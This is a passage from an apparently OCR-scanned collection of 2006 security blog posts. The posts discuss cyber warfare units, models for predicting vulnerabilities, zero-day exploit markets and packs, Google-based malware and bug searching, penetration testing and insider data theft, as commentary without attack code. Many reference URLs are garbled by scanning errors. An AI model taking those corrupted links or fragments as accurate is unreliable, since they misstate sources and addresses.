war forces shouldn’t come as a Surprise to anyone. But while North Korea is trying to balance 
its military powers through asymmetric and cyber warfare approaches given its outdated 
conventional weaponry thinking, | feel the real beast to worry about is China, who’s sneakily 
hiding behind its currently strategic economic position. As the latest report on "[12]Military 
Power of the People’s Republic of China 2006" points out : 


"The People’s Liberation Army (PLA) has established information warfare units to develop 
viruses to attack enemy computer systems and networks, and tactics and measures to protect 
friendly computer systems and networks." 


Taiwan is reasonably taking note on China’s [13]historical [14]cyber warfare actions and 
has [15]recently initiated its first cyber war game simulating attack from China : 


"The drill, part of the island’s annual major war game Hankuang No. 22, was held Wednesday 
and Thursday to intercept, block and counter a possible Chinese cyber attack of Taiwan’s 
major computer network to paralyze the island’s intranet operation, the Central News Agency 
quoted an unnamed defence source as saying." 


Let’s don’t forget the use and abuse of island hopping points fueling further tensions in 
key regions and abusing the momentum itself, [16]physically locating a network device in the 
future IPv6 network space is of key interest to all parties. 


War room courtesy of Northrop Grumman. 


Related resources: 
[17]Information Warfare 
[18]Cyber Warfare 


. http://photos1. blogger. com/blogger/1933/1779/1600/cwin_cutout. jpg 
. http: //ddanchev. blogspot .com/2006/05/whos-who-in-cyber-warfare.htm 


ttp://www.ists.dartmouth. edu/directors-office/cyberwarfare. pdf 


ttp://en.wikipedia.org/wiki/Command, control, _and_communications 


1 
2 
3 
4. http://www. vodium. com/MediapodLibrary/index.asp?library=dod_oft_incwkSessionArgs=0A1U0000000100000111 
5 
6 


ttp://www.smh.com.au/news/Technology/NKorea- operates-cyber-warfare-unit-to-disrupt-SKoreas-militarycomma 


nd-official/2006/07/12/1152637718059.htm 
http: //www.eweek.com/article2/0, 1895, 1987870, 00.asp 


7. 
8. http://www. informationweek.com/news/showArticle. jhtml?articleID=19030315 
9. http: //abcnews.go.com/Politics/wireStory?id=2184451&CMP=0TC-RSSFeeds0312 


10. http://www.strategypage.com/dls/articles/200561415936.asp 
11. http://www.wired.com/news/politics/0, 1283,59043,00.htm 


. http: //www.globalsecurity.org/military/library/report/2006/2006-prc-military-power . ht 


13. http://english. chosun. com/w21data/html/news/200407/200407 150028. htm 
14. http://www.taipeitimes.com/News/taiwan/archives/2006/06/19/2003314414 


ttp://tech.monstersandcritics.com/news/article_1180816.php/Taiwan_stages_cyber-war_game_simulating_attac 
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16. http://www. caida.org/~yoshi/KoBrCl05PDF-hires . pdf 
17. http://del.icio.us/DDanchev/InformationWarfare 
18. http://del.icio.us/DDanchev/Cyberwarfare 


2.7.13 Scientifically Predicting Software Vulnerabilities (2006-07-16 02:09) 


[1] * | recently came across to a research on "[2]Modeling the Vulnerability Discovery 
Process" discussing : 


"A few models for the vulnerability discovery process have just been published recently. 
Such models will allow effective resource allocation for patch development and are also 
needed for evaluating the risk of vulnerability exploitation. Here we examine these models 
for the vulnerability discovery process. The models are examined both analytically and using 
actual data on vulnerabilities discovered in three widely-used systems. The applicability of the 
proposed models and significance of the parameters involved are discussed. The limitations 
of the proposed models are examined and major research challenges are identified." 


A [3]handy summary of the report emphasises on how : 
"The Alhazmi-Malaiya Logistic model has already seen success in its predictions: 


- In 2005, it predicted the number of vulnerabilities discovered in Windows XP would 
grow rapidly. It has indeed grown from 88 in January 2005 to 173 by the latest count, making 
the vulnerability density of XP comparable to that of earlier version of Windows. 


- The model predicted that very few new vulnerabilities will be found in Red Hat Linux 
6.2, and the number has stayed unchanged at 117. 


- It predicted that the number of vulnerabilities of Windows 2000 will eventually range 
from 294 to 410. At that time of the prediction, the number was 172; it now is 250, and 
vulnerabilities are still being found." 


Remember the [4]U.S DHS’s $1.24M bug hunt funding, that came up with a [5]single 
X11 vulnerability? Money well spent for sure. 


HD Moore who's [6]obviously getting efficient, the potential of contests, futures market 
models, and my speculation on “every day there’s a new Oday in the wild" ruin the effect 
of any model. Assuming no external factors influence the process, and the rest remain 
static - while they rarely do - it’s a great initiative, still, more of a scientifically shooting 
into the dark one, given the great deal of uncertanties, and decentralized model of dis- 
covering, reporting, using and abusing vulnerabilities. If historical performance matters 
and can act as a key indicator for predicting the future, | wonder would MACs lack of vul- 
nerabilities continue to generate hype, it’s more of a "lack of incentives to find some" type 
of issue. Today’s vibrant vulnerability research intrigue is indeed capable of ruining any model. 


| also came across to a [7]great point, indicating that : 


"After the first week of flaws were released, one online miscreant from Russia shot off 
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an e-mail to Moore, complaining that he had outed a vulnerability the Russian had been 
exploiting, Moore said. 

"The black hats don’t like that the fact that this is public because they have been using these 
bugs," Moore said. "By dumping out the bugs on the community, I’m clearing the air and 
letting the good guys know what others are doing." 


From my point of view, the existence and usefulness of Metasploit is precisely the same 
type of dilema whether citizens should be allowed to carry guns for self-protection or blindly 
rely on 500 police officers for 500,000 people. Hopefully, with initiatives like the Month of the 
Browser bug ones, we would inevitably break through the "yet another Oday, where’s my patch 
dude? type of security issues to deal with. At the bottom line that’s a single, efficient security 
researcher who’s definitely working on building more awareness on what the corporate trolls 
are ignoring for the sake of their product portfolio diversification. 


It’s also interesting to mention on the emerging [8]underground Obay model for selling 
Oday vulnerabilities : 


"Cyber crooks are not hesitant to make such open declarations of illicit intent because 
of the anonymity offered by the Internet. Some have had the gall to try and peddle their 
information on popular online auction sites such as eBay. Last December eBay pulled an ad 
that was selling vulnerability information about Microsoft’s spreadsheet program Excel. That 
was a bold, if foolhardy, move on the part of the seller, because eBay is hardly blackmarket 
at all, said Ross Armstrong, senior analyst at technology consultancy firm Info-Tech Research 
Ltd. in London, Ont." 


and its corporate form, on which [9]Sergio Hernando was kind enough to point me to. 
[10]The VulnDisco Pack Professional : 


- contains more than 80 exploits 
- each month about 5-10 new exploits are made available in the form of updates 
- VulnDisco Pack Professional licenses are not limited to a number of seats 


and you can actually see an [11]OpenLDAP Oday exploit in action for yourself. 
Metasploit image courtesy of [12]Metasploit’s blog. 


Related resources and posts: 

[13]Vulnerabilities 

[14]Oday 

[15]Was the WMF vulnerability purchased for $4000?! 

[16]Obay - how realistic is the market for security vulnerabilities? 

[17]Where’s my Oday, please? 

[18]Delaying Yesterday’s "Oday" Security Vulnerability 

[19]Shaping the Market for Security Vulnerabilities Through Exploit Derivatives 
[20]Getting paid for getting hacked 


http: //photos1. blogger. com/blogger/1933/1779/1600/Metasploit_world. png 


1. 
2. http://portal.acm.org/affiliated/citation.cfm?id=1104997 . 1105240&coll=portal&amp ; amp ; amp ; d1=ACM&CFID=151 


1515&CFTOKEN=6184618 
3. http://www. physorg.com/news70807349. htm 
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4 
5. : . : 

6. 
7. : i . 

8. 

9 


ttp://www.eweek.com/article2/0,1759,1956652,00.asp 


. http: //www.sahw.com/wp/archivos/2006/07/14/vulndisco-pack-professional-de-compras-por-el-lado-oscuro/ 
fo cau mare TEMES 
hep: /evs.glog.net /flash/esindisco.opontdap hea 
ST 
13, http: //det.ieio.us /DDanchev/Vulnerabilivied 
ftp: /aot ete ua /Dancher/Ocad 


ttp://ddanchev. blogspot .com/2006/01/was-wmf-vulnerability-purchased-for.htm 


ttp://ddanchev. blogspot .com/2005/12/0bay-how-realistic-is-market-for.htm 


17. http://ddanchev. blogspot .com/2006/03/wheres-my-Oday-please.htm 
18. http://ddanchev. blogspot .com/2006/05/delaying-yesterdays-Oday-security.htm 
. http://ddanchev. blogspot .com/2006/05/shaping-market-for-security.htm 


ttp://ddanchev. blogspot .com/2006/03/getting-paid-for-getting-hacked_17.htm 


2.7.14 Weaponizing Space and the Emerging Space Warfare Arms Race 
(2006-07-16 14:50) 


[1] * Satellites Jamming, Hijacking, Space SIGINT, Space Kill Vehicles are just the tip of the 
iceberg in the ongoing weaponization of Space. In previous posts "[2]Who needs nuclear 
weapons anymore?", "[3]EMP warfare - Electronic Domination in Reverse", and "[4]ls a Space 
Warfare arms race really comming?" | expressed my opinion on the current and emerging 
efforts to install and experiment with space weapons, and mostly emphasized on the major 
problem - the arms race fear itself. What’s also worth mentioning is how the original [5]Janti- 
missile defense system Star Wars, transformed from a defensive, to an offensive tool for 
warfare. SFAM at the [6]CyberpunkReview.com made a [7]good comment : 


"Weaponizing space when there really isn’t any competitor is a really bad idea. Truly 
though, the issue that obfuscates things is the US military’s change from a threat-based 
acquisition system (where weapon systems were acquired to combat specific and verifyable 
threats) to a capability-based acquisition system is the problem. The switch to a capability- 
based system, being divorced from threats (since the Wall fell, most of the threats did as 
well), can find justification for new weapon systems even if there isn’t a verifyable enemy 
or even a proven, irreplaceable need in warfare for the technology. Case in point - nobody 
is challenging the US for air surpremacy, yet we have massively expensive acquisitions un- 
derway for the F-22 (which should have been killed in 1991) and the F-35 (Joint Strike Fighter)." 


Just came across to a great initiative aiming to act as a faciliator for debating the prob- 
lem. The [8]SpaceDebate.org aims to: 


"expand the debate on the weaponization of space through a collaborative wiki-like tool 
for structured debate on a topic. You can learn more by taking the [9]quick tour, reading the 
[10]aboutpage, or browsing our [11]frequently asked questions. You can also jump into the 
debate by browsing our [12]argument listor one of the [13]positions" 
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| feel there’s a more serious problem we should be discussing for the time being com- 
pared to the world’s super powers waging wars in space, and it’s called Near Earth Object 
Protection - there’s even a [14]distributed client for tracking the hazard posed by NEOs. For 
instance, consider the following [15]Jalternatives for combating the real threat in space - the 
universe itself : 


"There’s been no shortage of ideas how to fend off unfriendly fire from the cosmos: laser 
beams, [16]space tugboats, [17]gravity tractor, and solar sails for example, as well as 
using powerful anti-NEO bombs, conventional as well as nuclear. Ailor, also Director of The 
Aerospace Corporation’s Center for Orbital and Reentry Debris Studies, told SPACE.com that 
creative ways to deflect Earth-harming NEOs are far from being exhausted. People have put a 
lot of concepts on the table over time, Ailor said. Now we’re beginning to try and develop an 
organized way of looking at those things and finding out which ones are really viable in the 
short-term, medium-term, and what technologies do we need to protect and develop for the 
long-term as well." 


[18] * I’ve always thought the human race is an experiment of a [19]super intelligent 
race trying to figure out how long it’s gonna take us to self-destroy our kind. In case you're 
interested in the current situation on space warfare, you can also go through the [20]Space 
Security 2006 book (111 pages), and [21]previous editions as well. An excerpt from the 
[22]executive summary : 


"A growing number of states, led by China, Russia, the US, and key European states, in- 
creasingly emphasize the use of space systems to support national security. Dependence on 
these systems has led several states to view space assets as critical national security infras- 
tructure. US military space doctrine has also begun to focus on the need for “counterspace 
operations” to prevent adversaries from accessing space. Building on existing trends, in 2005 
actors that included the EU, India, Israel, and Japan placed more emphasis on the national 
security applications of space. Israel and Japan introduced plans to boost surveillance capa- 
bilities from space. India’s Air Force urged the government to set up a Strategic Aerospace 
Command to better develop military space capabilities." 


Don’t look for enemies where there aren’t still any, but deal with the real space threat. 
Camouflage, Concealment, and Deception (CC &D) techniques table courtesy of FAS’s 
"[23]Threats to United States Space Capabilities" 


Related resources: 
[24]Space 
[25]SPAWAR 


http: //photos1. blogger. com/blogger/1933/1779/1600/Space%20Weapons. jpg 
ttp://ddanchev. blogspot .com/2006/02/who-needs-nuclear-weapons- anymore. htm 


ttp://ddanchev. blogspot .com/2006/05/emp-attacks-electronic-domination-in.htm 
http: //ddanchev. blogspot .com/2006/03/is-space-warfare-arms-race-really.htm 


10. http://www.spacedebate.org/about 
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1. 
2. 
3. 
4. 
5. http: //en.wikipedia.org/wiki/Strategic_Defense_Initiative 
6. 
7. 
8. 
9. 


~ 


11. http://www.spacedebate.org/help 
12. http://www.spacedebate.org/arguments 

13. http://www.spacedebate.org/positions/ 
14. http://orbit.psi.edu 


~ 


15. http://www.space.com/news/060628_neo_workshop.htm 

16. http://www.space.com/businesstechnology/technology/asteroid_tug_031015.html 
17. http://www.space.com/businesstechnology/051109_asteroid_tractor.htm 

18. http://photos1. blogger .com/blogger/1933/1779/1600/CCD. jpg 

19. http://en.wikipedia.org/wiki/Extraterrestrial_life 

20. http://www. spacesecurity.org/SS12006. pdf 

21. http://www. spacesecurity.org/publications.ht: 


Eh 


22. http://www. spacesecurity.org/SSI2006ExecutiveSummary .pd 
23. http://www.fas.org/spp/eprint/article05.htm 

24. http://del.icio.us/DDanchev/Space 

25. http://del.icio.us/DDanchev/SPAWAR 


2.7.15 Malware Search Engine (2006-07-17 23:06) 


[1] * While it seems that it takes a [2]publicly traded Internet filtering company to come up 
with quite some creativity, it’s always coming back to the community to break through the 
FUD and release a PoC [3]Malware Search Engine. 


The concept is great, excluding the dark web(closed behind authentication, and basic 
crawler blocking approaches), but what bothers me besides all the fuss is that it’s a [4]signa- 
ture based approach taking advantage of the most recent Google’s crawl of the Web. Oday 
malware naturally remains undetected, while it’s a great way to sum up the percentage of 
infections with known malware on different domains/hosts, given you know what and where 
to look for. It’s not the binary nature of a malware to emphasize on, but today’s malware 
released under a GPL license, an issue | stated as a key factor for the [5]future growth of 
malware at the beginning of 2006. | also came across to an [6]Jarticle pointing out the same 
problem : 


[7] * "Open tools and techniques have found favor among an unlikely community. Malware 
writers are using open-source ideas and tools to share malicious code, collaborate, and wreak 
online mayhem, the security firm McAfee said in a report issued Monday. Cyber criminals 
are making available source code with documentation so that it can be easily modified using 
popular open-source project management tools like Content Versioning System (CVS), thus giv- 
ing malware creation a high degree of efficiency, said McAfee’s Global Threat Report for 2006." 


To keep the discussion going by the time | release a summary of what I’ve been coming 
across for quite a while - tons of bot source codes available on the public Web, barely any 
binaries - go through previous posts related to the diverse topic as well. 


UPDATE : eWeek has a [8]nice article on the topic 


[9]Malware 
[10]Malware trends - Q1, 2006 
[11]What are botnet herds up to? 
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[12]Why relying on virus signatures simply doesn’t work anymore? 
[13]Skype to control botnets?! 

[14]The War against botnets and DDoS attacks 

[15]Master of the Infected Puppets 

[16]One bite only, at least so far! 

[17]Look who’s gonna cash for evaluating the maliciousness of the Web 
[18]The anti virus industry’s panacea - a virus recovery button 
[19]No Anti Virus Software, No E-banking For You 

[20]The Current State of Web Application Worms 

[21]Web Application Email Harvesting Worm 

[22]Unknowingly Becoming a Child Porn King 

[23]Real-Time PC Zombie Statistics 

[24]Malicious Web Crawling 


Agobot configuration interface courtesy of Hakin9’s "[25]Robot Wars - How Botnets Work". 


_ivtp://photos1. blogger .con/blogger/1993/1779/1600/nalwere.0. pg 
_uctp://vebsense. con/global/en/Investors/ 

| cep: //netasploit. con/research/nisc/avecarch/indox eal 

_ tp: //netasploit.con/research/nisc/awsearch/sigs. txt 

,hcep://www. packetetornsecurity .org/papers/general/ualvare- trends pad 

. http://www.redherring.com/Article.aspx?a=17610éhed=Malware+Turns+to+0pen+Source&sector=Industriesksubsect 
7. hvtp:/ /photos1, blogger .con/blogger/1993/1779/1600/botuet_rysunek_031126350058890. jpd 

8. notp: //www.eveek.con/article2/0, 1696, 1990158, 00. asp 

9, http: /del cio. us/DDanchev/Malvare 

10. hetp://ddanchev bLogspot.con/2006/02/recent-nalvare- developments. neal 


11. http: //ddanchev.blogspot.com/2006/01/what-are-botnet-herds-up-to.htm 


1 
2 
3 
4 
5 
6 


. http: //ddanchev.blogspot .com/2006/01/why-relying-on-virus-signatures-simply.htm 


13. http://ddanchev.blogspot.com/2006/01/skype-to-control-botnets.htm 
. http: //ddanchev.blogspot .com/2006/02/war-against-botnets-and-ddos-attacks.htm 
15. http: //ddanchev.blogspot.com/2006/02/master-of-infected-puppets. htm 


http: //ddanchev. blogspot. com/2006/02/one-bite-only-at-least-so-far.htm 
http: //ddanchev.blogspot.com/2006/02/look-whos- gonna-cash-for-evaluating.htm 


. http: //ddanchev.blogspot .com/2006/04/anti-virus- industrys-panacea-virus.htm 


. http: //ddanchev. blogspot .com/2006/05/no-anti-virus-software-no-e-banking. htm 


20. http: //ddanchev. blogspot .com/2006/05/current-state-of-web-application-worms.htm 


. http: //ddanchev. blogspot .com/2006/06/web-application-email-harvesting-worm. htm 


. http: //ddanchev. blogspot. com/2006/06/unknowingly-becoming- child-porn-king.htm 


. http: //ddanchev. blogspot .com/2006/06/real-time-pc-zombie-statistics.htm 


24. http: //ddanchev. blogspot .com/2006/06/malicious-web-crawling. htm 
25. http://www.windowsecurity.com/articles/Robot-Wars-How-Botnets-Work.htm 


2.7.16 Open Source North Korean IMINT Reloaded (2006-07-20 23:42) 


[1] * Continuing the [2]latest coverage on [3]North Korea, and the [4]Travel Without Moving 
[5]series, yesterday | came across to an ongoing initiative on [6]Google-Earthing the North 
Korean Military pointing out that : 
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"In fact, there are several military and intelligence employees, some retired and some 
active, who turn the defense job into a hobby, helping to point out and explain foreign military 
curiosities at the very civilian level of Google Earth. One current imagery analyst explained 
that, though he never divulges classified information, he often ‘identifies naval vessels at’ 
bases that ordinary Google Earth explorers have stumbled upon. Also, maps from sites such 
as [7]Globalsecurity.orgare overlayed onto the framework of Google Earth. Like an army of 
ants, the nearly 550,000-strong Google Earth community has voraciously explored the North 
Korean military installations, including : [8]Musadan-ri/No-Dong missile test site, [9]Pipa Got 
naval base, [10]Cho Do naval base" 


Given the powerful driving force and the size of the Google Earth’s community it could 
definitely save tax payers’ dollars, but high-resolution and timely imagery still remain a critical 
issue here. Open Source [11]IMINT is gaining scale and I’m sure [12]someone’s watching the 
trend as well. 


Related resources and posts : 

[13]GEOINT 

[14]Reconnaissance 

[15]The "threat" by Google Earth has just vanished in the air 

[16]Suri Pluma - a satellite image processing tool and visualizer 
[17]Security quotes : a FSB (successor to the KGB) analyst on Google Earth 


[18]Satellite Reconnaissance of the Future (1998) 
[19]Military Reconnaissance Satellites (IMINT) 
[20]Military Intelligence Satellites 

[21]North Korea Sightseeing 

[22]Shedding light on North Korea (330+ placemarks) 


_hvtp://Adanchey. blogspot. con/2006/06 north korea-turn-on-lights-please tal 
. http: //ddanchev.. blogspot . com/2006/07 /north~koreas-cyber-warfare-unit-121. html 
_hvtp://adanchey. blogspot. cou/2006/0T /travel-vithout-noving-north-korea.htal 
Fite ascacuse’ologspst con 2006/05 ecaved citnout sovingtorens, 77 mead 
ttp://www.radioopensource. org/google-earthing-the-north-korean-military/ 
oa eT 

_netp://bbs keyhole com/ bb dovnload phpiunber=213366 

_hvep://bb. keyhole. con/abe /download,php?Muber=f87653 


10. http://bbs.keyhole.com/ubb/download. php?Number=507504 


ttp://photos1.blogger .com/blogger/1933/1779/1600/goodsubs. jpg 


_hetp:/ /wuy. £25. org/ixp/imint/ index. a] 
| fep://awy.aro. gov 
13, ietp://del. cio. us/BDanchev/GED1NI 
 ftep:/ [del 4ci0,us/DDencher/Recomeisnancd 
_netp:/ /adenchev. blogspot .con/2006/04/threat-by-google-earth-has just. heal 


ttp://ddanchev. blogspot .com/2006/02/suri-pluma-satellite-image-processing.htm 


| http://any. dtic.nil/doctrine/jel/ 49, pube/0718. pif 
19, jetp://ow.cdi.org/terrorian/satel Lives. cfm 

_hetp:/ /ret.gefc nasa. gov/Intro/Part2_ 260, nal 

_hetp:/ /wiw. googleenrtihacks.cok/dovnloads/country.pip?countzy=76 
22. http://bbs. keyhole. com/ubb/showf lat . php?Number=145735 
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2.7.17 Budget Allocation Myopia and Prioritizing Your Expenditures (2006-07-21 00:43) 


[1] * Top management’s empowerment - the dream of every CSO, or IT manager responsible 
for allocating the infosec budget, and requesting future increases. The biggest downsize of 
your current or future empowerment, is how easy it is to get lost in a budget allocating myopia 
compared to actual prioritizing of your expenditures. According to Gartner, [2]security is all 
about percentage of budget allocation : 


"Organizations that have reached a high level of IT security practice maturity can safely 
reduce spending to between 3 % and 4 % of the IT budget by 2008, according to research 
firm Gartner Inc. By contrast, organizations that are inefficient or have historically under 
invested in security may spend upwards of 8 % of their IT budget on security. This means 
that many organizations will still be investing aggressively for the next few years. Rich Mogull, 
research vice president and conference chair of the Gartner IT Security Summit which starts 
in Sydney Tuesday, said that there are now solutions to most information security problems. 
It’s just a matter of implementing the technology efficiently and effectively so resources 
can be focused on new threats," Mogull said. While information security has become a 
highly specialized branch of IT, commodity security functions are often being returned to IT 
operations. Organizations that are still impacted by everyday, routine threats must ramp up 
and become more mature in their approach." 


| find this a wrong emphasis on higher spending as the corner stone of "better security", 
and even if it is so, who’s your benchmark at the bottom line? In a previous in-depth post 
on [3]Valuing Security and Prioritizing Your Expenditures, | discussed the currently hard to 
implement ROSI model, and pointed out the following key points on data security breaches 
and security investments : 


- on the majority of occasions companies are taking an outdated approach towards secu- 
rity, that is still living in the perimeter based security solutions world 


- companies and data brokers/aggregators are often reluctant to report security breaches 
evenwhen they have the legal obligation to due to the fact that, either the breach still hasn’t 
been detected, or the lack of awareness on what is a breach worth reporting 


- the flawed approaches towards quantifying the costs related to Cybercrime are result- 
ing in overhyped statements in direct contradiction with security spending 


- companies still believe in the myth that spending more on security, means better secu- 
rity, but that’s not always the case 


- given the flood of marketing and the never ending "media echo" effect, decision mak- 
ers often find themselves living with current trends, not with the emerging ones, which is what 
they should pay attention to 


There’s also a rather simplistic explanation on the effect of industry convergence : 


"Mogull also said that functional convergence in security products is occurring. For ex- 
ample, host firewalls, antivirus, antispam, and basic host intrusion prevention are combining 
into single, desktop agents. In the future, this will make security less complex, he said." 
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Wish the analyst has reached the potential TCO increase and the beneficial diversifica- 
tion of appliances/products trade-off concept stage, one that naturally depends on the 
perspective of course. Meanwhile, here’s [4]an article on how NOT to "sell security" to your 
CEO, they tend to understand the basics of ROI, it’s just the RO(S)I they want to scientifically 
apply - compliance is perhaps your best friend these days. It’s not about the percentage of 
spending, but on what you’re actually spending for, and when. 


Go through a previous post on [5]information security market trends to consider, and 
try to stay on the top of security, not in line with it. 


1. http://photos1 .blogger .com/blogger/1933/1779/1600/market . jpg 


2. |http://computerworld.com/action/article.do?command=viewArticleBasicktaxonomyName=security&articleId=90018 


31&taxonomyId=1 


3. http: //ddanchev. blogspot. com/2006/05/valuing-security-and-prioritizing-your .htm 


4. ttp://www.computerworld.com/action/article.do?command=viewArticleBasickarticleId=112203&%source=NLT_SHARK 
5. http: //ddanchev.blogspot .com/2006/04/spotting-valuable-investments-in. html 


2.7.18 When Financial and Information Security Risks are Supposed to Intersect 
(2006-07-21 01:30) 


[1] 


ot 


gan Sari 


Interesting [2]security event at Morgan Stanley’s NYC headquarters related to insider abuse, 
mostly interesting because the clients’ list and charged fees weren’t even uploaded on any 
removable media, but forwarded to the consultant’s private email account : 


"A former consultant to Morgan Stanley has been arrested and charged with stealing an 
electronic list of hedge funds and the rates the investment bank charges them. The hedge 
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funds are clients in the company’s prime brokerage business. According to court documents, 
Chilowitz is accused of sending a copy of the firm’s administrative client list and its client rate 
list for the prime brokerage business in February from Morgan Stanley’s offices in New York to 
his personal e-mail account at his home in Virginia." 


| once said that nothing’s impossible, the impossible just takes a little while, but given 
[3]who Morgan Stanley is when it comes to risk management, assessment, let’s don’t say risk 
engineering - psst, [4]paying $15m in order not to pay $1.5B is such a sound investment - 
they should have never allowed for this type of info to leave over the Web. 


Meanwhile, the WSJ is reporting that [5]Employers Increasingly Firing Staffers for E-mail 
Violations : 


"The news comes from the [6]2006 Workplace E-Mail, Instant Messaging and Blog sur- 
vey from the American Management Association and the ePolicy Institute, according to the 
Journal. The survey found that more than a quarter of the employers queried had fired an 
employee for violating company e-mail policy, up 9 percent from the 17 percent of employers 
who let employees go for similar violations in 2001, the Journal reports. On top of this finding, 
the survey also said that 2 percent of respondents had fired workers for instant-message 
correspondences that weren’t appropriate, and another 2 percent of employers said they’d 
fired a staffer for posting distasteful content on a Web log—or blog—be it their professional or 
personal page, according to the Journal." 


[7]Security policies are not the panacea of security, they are the basics, so consider de- 
veloping and monitoring the effectiveness of one. My advise - think twice before feeling 
like a smart ass for exploiting your interns next time, and yes, [8]fingerprint [9]your most 
[10]valuable [11]IP assets as well. 


http: //www.windowsecurity.com/pages/security-policy. pdf 
: 

| 

10. 
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2.7.19 Anti Virus Signatures Update - It Could Wait (2006-07-21 02:07) 


[1 
5 
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Failures in Detection (Last 7 Days) 


Blue: Infected files detected by all antivirus engines. 
Red: Infected files not detected by at least one antivirus engine. 


It’s a common myth that all AV vendors exchange the malware they come across in between 
themselves, whereas that’s obviously not always the case. And even if they don’t, you’d better 
achieve a higher state of security in respect to ensuring your PC or network are protected 
from the majority of known malware threats, trouble is the average end users whose Internet 
connection speed is reaching that of an average ISP (metaphor), doesn’t seem to bother 
because of the following concerns : 


- it could wait 

- it takes decades to update 

- it would influence their superman’s productivity 
- where’s the update button by the way? 


From the press release of a [2]commissioned survey : 


"Harris Interactive® fielded the online survey among a nationwide sample of 2,079 U.S. 
adult computer users 18 years of age or older. The survey reveals that: Despite 55 percent 
being very confident or confident in the protectionoffered by the antivirus program on their 
computer, 42 percent have been affected by malware. A surprising 65 percent have postponed 
updating their virus protection. Of these adults, their top reasons for not updating are: 


It was too disruptive to what they were doing on the computer - 38 % 
They thought it was something that could wait - 32 % 

They thought it would take too long - 27 % 

They weren’t sure how to update the antivirus program - 14 %" 


These very same end users represent among the key factors for successful assembling 
of botnets these days. If you secure the entire population, you'll end up with a secure sample 
itself, but the novice user’s lack of incentives is ruining the whole effect - and driving the 
[3]DDoS protection tools market segment of course. | also wonder how did [4]Gartner manage 
to estimate Panda Software’s revenues and market share, given that compared to the rest 
of the publicly traded companies it’s free from the burden of having stakeholders breathing 
down their neck? 
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Failures in Detection courtesy of [5]VirusTotal. 


1. http: //photos1.blogger.com/blogger/1933/1779/1600/signatures_sharing. jpg 

2. http: //www.eset.com/company/article.php?content ID=155 

3. http: //ddanchev. blogspot .com/2006/02/war-against-botnets-and-ddos-attacks.htm 
4. http://www.gartner.com/press_releases/asset_154006_11.htm 

5. 


ttp://www.virustotal.com/ 


2.7.20 Detailed Penetration Testing Framework (2006-07-21 02:44) 


[1] * This framework is simply amazing, as it takes you through [2]the entire process of 
penetration testing, step-by-step in between references to the tools necessary to conduct a 
test - wish experience was commodity as well. [3]Best practices are prone to evolve the way 
experience does, so consider adding some of your know-how, and going through Fyodor’s 
[4]Top 100 Network Security Tools list in case you’re looking for improved efficiency. It’s 
not about the quality and diversity of tools, but about the quality of the approach, still the 
framework is a nice one to begin with. 


Photo courtesy of IBM, featuring ethical hacker [5]Nick Simicich. You may also find Se- 
cure DVD, a collection of the 10 Best Security Live CD Distros (Pen-Test, Forensics & Recovery) 
[6]handy. 


http: //photos1. blogger. com/blogger/1933/1779/1600/Dcp00533- 784234. jpg 


ttp://www.vulnerabilityassessment.co.uk/Penetration/20Test.htm 


1. 

2. 

3. http://www.isecom. org/osstmm/ 

4. http://sectools.org/ 

5. http://www. cnn. com/TECH/computing/9811/27/hacker . interview/ 
6. 


ttp://www.securedvd.org/about.htm 


2.7.21 Searching for Source Code Security Vulnerabilities (2006-07-21 16:36) 


[1] * While Google was quick enough to censor the colourful [2]Malware Search [3]logo 
- colourful branding - here’s another recently started initiative, [4]Bugle - a google based 
source code bug finder : 


"Bugle is a collection of search queries which can help to identify software security bugs 
in source code available on the web. The list at the moment is rather small (you get the idea 
though), hopefully people will start sending more queries. Source code review is not a straight 
forward operation , using the list you will get pinpoints and not definite results." 


It could easily help you spot source code containing common bugs without the need of 
[5]using a scientific model to predict vulnerabilities, but you should also consider the [6]pow- 
erful source code search engine Koders which is currently searching 225,816,744 lines of code, 
and [7]provides you with the option to segment your queries based on programming language. 


Related resources: 
[8]SecureProgramming.com - latest update January, 2005, useful links through 
[9]An overview of common programming security vulnerabilities and possible solutions 
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[10]Insecure Programming by example 
[11]Top 7 PHP Security Blunders 


ttp://photos1.blogger .com/blogger/1933/1779/1600/bugle. jpg 


H 


. http: //ddanchev.blogspot .com/2006/07/malware- search-engine. htm 
. http://metasploit .com/research/misc/mwsearch/malware. jpg 


ttp://www.cipher .org.uk/index .php?p=projects/bugle.project 


. http: //ddanchev.blogspot .com/2006/07/scientifically-predicting-software.htm 


. http: //koders.com/ 


. http://koders.com/info.aspx?c=GettingStarted 
. http: //www.secureprogramming.com/ 


. http: //fort-knox.org/thesis. pdf 


10. http://community.core-sdi.com/~gera/InsecureProgramming/ 
11. http://www.sitepoint.com/print/php-security-blunders 


2.7.22 An Intergalactic Security Statement (2006-07-24 22:44) 


[1] * Hell of a comment on the [2]Malware Search Engine. [3]Hackers crack secret Google 
malware search codes : 


"Hidden malware search capabilities within Google which were reserved for antivirus 
and security research firms just weeks ago have been cracked by hackers, according to 
security industry sources. The key to finding malware in Google lies in having the signature 
for the specific malware program, according to researchers from enterprise IT security firm 
Secure Computing. However, the company reported that these previously hidden search 
capabilities have recently fallen into the hands of hackers. Why bother creating a new virus, 
worm or Trojan when you can simply find one and download it using Google? said Paul Henry, 
vice president of strategic accounts at Secure Computing. Unskilled hackers can use this 
previously unknown capability of Google to download malware and release it on the internet 
in targeted attacks as if they wrote it themselves." 


Bothering to create a new piece of malware and ensuring its payload gets regularly updated 
to avoid AV detection is perhaps the most logical need compared to doing reconnaissance for 
known malware through Google. Looking for the signature means the piece of malware has 
already been detected somehow, somewhere, namely it’s useless even to a script kiddie as 
| doubt one would do a favor to another, thus increasing the size of someone else’s botnet. 
What you can actually use it for, is look for [4]packed binary patterns, or [5]known functions, 
and draw up better conclusions. 


| really hope Secure Computing are more into [6]harnessing the brand and product port- 
folio’s power of CipherTrust, than they are into the [7]dangers of known malware, not that 
there aren't exceptions of course! 


Space wisdom courtesy of [8]Doctor Fun. 


1, ht ip://photost blogger. con/bogger/1988/1779/1600/af941019.0. jpg 
2. hevp://adanchev blogspot .con/2006/07 /nalvare-search- engine. hem 

3, http://mmv. vnunet. con/vmunet /news/2160008/nackers~crack-secret-googld 
4, hetp://ologe securitoan. con/inden.php/archives/519 
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ttp://asert .arbornetworks .com/2006/07/googling- for-malware-bobbing-for-mass-mailers/ 
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6. http://www. redherring.com/article.aspx?a=1758 


7. http: //ddanchev. blogspot .com/2006/07/anti-virus-signatures-update-it-could.htm 


8. http://www. ibiblio.org/Dave/ 


2.7.23 Latest Report on Click Fraud (2006-07-25 00:09) 


[1] * Google does have countless features, and it’s not even considering to stop rolling 
new ones, but the secret to its huge [2]market capitalization and revenue stream remains its 
advertising model fully utilizing the [3]Long tail’s concept. Therefore, click fraud remains the 
